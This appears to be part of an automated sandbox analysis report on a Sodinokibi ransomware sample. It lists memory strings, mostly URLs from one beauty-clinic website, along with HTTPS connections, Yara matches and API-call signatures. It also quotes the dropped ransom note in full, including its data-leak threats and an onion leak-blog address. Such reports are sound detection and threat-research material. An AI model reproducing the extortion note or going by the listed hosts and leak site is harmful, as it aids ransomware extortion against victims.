          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/plugins/mailchimp-for-wp/assets/js/forms.min.js?ver=4.8
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/animate.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/bootstrap.min.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/button.hover.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/custom.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/owl.carousel.min.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/owl.theme.default.min.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/responsive.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/css/youtubecss.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/banner/mobile/3.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/banner/mobile/4.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/banner/mobile/banner-1-mobile.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/banner/mobile/luxe-vip-mobile.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/icons/book-consult.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/inner-background/testimonial-bg.jpg);
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/images/logo/favicon.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/js/bootstrap.min.js?ver=1
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/js/jquery.min.js?ver=1
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/js/owl.carousel.min.js?ver=1
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/js/wow.min.js?ver=1
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/themes/youbysia/js/youtubejs.js?ver=1
          Source: tS9P6wPz9x.exe, 00000000.00000002.602709705.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uplo
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/06/1.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/06/2.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/06/3.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/06/4.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/06/5.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/06/6.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/1.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/1.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/10.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/2.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/3.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/4.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/5.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/6.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/7.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/8.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/9.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/Sia-Logo
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/07/afterpay.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/08/1-1.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/08/EOFY-40-FB-Post-1.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/09/Press-release-on-Socail-101-YouBySia.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/09/Sia-Hendry-podcast-LAser-Facial-Treatments.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/10/tlc.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/11/Coz-beauty-magazine.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/11/Group-194-1.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/11/Sunrise-7-show.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/11/spa-clinic-magazine.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Blog-Img_001.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Group-156.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Image-from-iOS.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Img-01.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/LGBT_flag-_YBS.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Youbysia_web-banner_v003-01.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Youbysia_web-banner_v003-1.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Youbysia_web-banner_v003-2.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/Youbysia_web-banner_v003.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmp, tS9P6wPz9x.exe, 00000000.00000002.602709705.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2020/12/phone.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmp, tS9P6wPz9x.exe, 00000000.00000003.552283944.00000000038F1000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2021/01/rosacea-treatment.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2021/02/Laser-Treatment-for-Dry-skin-You-By-Sia-2.jpg
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-content/uploads/2021/02/Popup-Design_v001-1.png
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-includes/css/dist/block-library/style.min.css?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-includes/js/wp-embed.min.js?ver=5.4.4
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-includes/wlwmanifest.xml
          Source: tS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmp, tS9P6wPz9x.exe, 00000000.00000002.602709705.00000000038EA000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au/wp-json/
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fyoubysia.com.au%2F
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fyoubysia.com.au%2F&#038;format=xm
          Source: tS9P6wPz9x.exe, 00000000.00000003.554582389.0000000002A41000.00000004.00000040.sdmpString found in binary or memory: https://youbysia.com.au/xmlrpc.php?rsd
          Source: tS9P6wPz9x.exe, 00000000.00000003.552472095.0000000000BEF000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.com.au:443/
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.gettimely.com/book
          Source: tS9P6wPz9x.exe, 00000000.00000003.552336995.000000000391A000.00000004.00000001.sdmpString found in binary or memory: https://youbysia.gettimely.com/giftvouchers/mobile
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownHTTPS traffic detected: 185.2.4.64:443 -> 192.168.2.3:49741 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 87.230.41.243:443 -> 192.168.2.3:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 166.62.110.232:443 -> 192.168.2.3:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 74.220.215.94:443 -> 192.168.2.3:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.201.60.54:443 -> 192.168.2.3:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 66.155.35.240:443 -> 192.168.2.3:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.72.5.145:443 -> 192.168.2.3:49748 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.72.5.145:443 -> 192.168.2.3:49749 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.175.106.113:443 -> 192.168.2.3:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.195.240.117:443 -> 192.168.2.3:49752 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 89.46.91.28:443 -> 192.168.2.3:49753 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.168.131.241:443 -> 192.168.2.3:49754 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 136.243.147.81:443 -> 192.168.2.3:49755 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.165.53.185:443 -> 192.168.2.3:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 85.234.145.174:443 -> 192.168.2.3:49757 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 85.234.145.174:443 -> 192.168.2.3:49758 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 79.137.75.185:443 -> 192.168.2.3:49759 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.107.227.241:443 -> 192.168.2.3:49760 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.78.13:443 -> 192.168.2.3:49761 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.139.128.10:443 -> 192.168.2.3:49762 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 159.69.118.212:443 -> 192.168.2.3:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.98.131.150:443 -> 192.168.2.3:49764 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 83.166.155.153:443 -> 192.168.2.3:49765 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.93.110.250:443 -> 192.168.2.3:49766 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 94.16.115.81:443 -> 192.168.2.3:49767 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 35.221.46.9:443 -> 192.168.2.3:49768 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 198.12.145.239:443 -> 192.168.2.3:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 144.76.225.204:443 -> 192.168.2.3:49770 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 52.29.252.113:443 -> 192.168.2.3:49771 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 178.250.15.192:443 -> 192.168.2.3:49772 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 155.133.142.13:443 -> 192.168.2.3:49773 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.9.188:443 -> 192.168.2.3:49774 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.26.13.9:443 -> 192.168.2.3:49775 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.93.110.250:443 -> 192.168.2.3:49776 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 46.30.215.215:443 -> 192.168.2.3:49777 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 172.67.222.33:443 -> 192.168.2.3:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 116.90.53.15:443 -> 192.168.2.3:49779 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 116.90.53.15:443 -> 192.168.2.3:49780 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 85.119.82.125:443 -> 192.168.2.3:49781 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 85.119.82.125:443 -> 192.168.2.3:49782 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.121.58.131:443 -> 192.168.2.3:49783 version: TLS 1.2
          Source: tS9P6wPz9x.exe, 00000000.00000002.596864356.0000000000B4A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: tS9P6wPz9x.exe, 00000000.00000003.391989730.0000000000BB5000.00000004.00000001.sdmpBinary or memory string: !F_WinAPI_RegisterRawInputDevices.au3a

          Spam, unwanted Advertisements and Ransom Demands:

          barindex
          Found ransom note / readmeShow sources
          Source: C:\4wfaj7427w-readme.txtDropped file: ---=== Welcome. Again. ===------=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 4wfaj7427w.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] Data leak [+]First of all we have uploaded more then 80 GB archived data from \\UDATA.Example of data:- Accounting- Finance- Personal Data- Banking data- Strategic sourcing- Management- projects, plans- Confidential filesAnd more other...Our blog:http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/Read what happens to those who do not pay.We are ready:- To provide you the evidence of stolen data- To give you universal decrypting tool for all encrypted files.- To delete all the stolen data.[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.[+] HoJump to dropped file
          Yara detected Sodinokibi RansomwareShow sources
          Source: Yara matchFile source: 00000000.00000003.204386386.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.204547357.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.204201424.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.204266101.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.204328055.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.204654521.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.204504022.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.204445658.0000000002DB9000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: tS9P6wPz9x.exe PID: 2844, type: MEMORY
          Contains functionalty to change the wallpaperShow sources
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C453E GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC,0_2_009C453E
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeProcess Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C3B8E OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_009C3B8E
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009CB82A0_2_009CB82A
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C865D0_2_009C865D
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009CAB950_2_009CAB95
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C8B800_2_009C8B80
          Source: C:\Users\user\Desktop\tS9P6wPz9x.exeCode function: 0_2_009C83FF0_2_009C83FF
          Source: tS9P6wPz9x.exe, 00000000.00000002.596771888.0000000000B30000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs tS9P6wPz9x.exe
          Source: tS9P6wPz9x.exe, 00000000.00000002.601804176.00000000029D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs tS9P6wPz9x.exe
          Source: tS9P6wPz9x.exe, 00000000.00000002.601788644.00000000029C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs tS9P6wPz9x.exe
          Source: tS9P6wPz9x.exe, 00000000.00000002.599731233.0000000002520000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs tS9P6wPz9x.exe
